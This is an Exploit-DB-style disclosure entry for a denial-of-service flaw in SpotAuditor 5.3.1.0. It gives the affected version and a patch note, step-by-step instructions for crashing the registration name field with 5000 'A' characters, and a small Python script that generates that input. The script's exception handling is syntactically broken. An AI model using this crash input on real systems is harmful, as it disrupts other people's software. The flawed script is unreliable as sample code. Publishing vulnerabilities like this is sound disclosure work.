SpotAuditor 5.3.1.0 - Denial of Service

vendor:

SpotAuditor

by:

Sanjana Shetty

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: SpotAuditor

Affected Version From: 5.3.1.0

Affected Version To: 5.3.1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:nsauditor:spotauditor

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2019

SpotAuditor 5.3.1.0 – Denial of Service

SpotAuditor 5.3.1.0 is vulnerable to a denial of service attack. By entering 5000 A's into the name field of the register functionality, the application will crash.

Mitigation:

Upgrade to the latest version of SpotAuditor to fix this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
# Author: Sanjana Shetty
# Date: 2019-10-13
# Version: SpotAuditor 5.3.1.0
# Vendor Homepage: http://www.nsauditor.com
# Software link: http://spotauditor.nsauditor.com/


# <POC by Sanjana Shetty>
# Steps

[1] Install the SpotAuditor software

[2] Access the register functionality

[3] In the name field enter 5000 A's and press enter, this will crash the
application.

==== use below script to create 5000 A's to a text file and copy it to the name field============


print ("# POC by sanjana shetty")

try:
       f = open("file.txt","w")
       junk =  "\x41" * 5000
       f.write(junk)
       print ("done")

except (Exception, e):

      print ("#error - ") + str(e)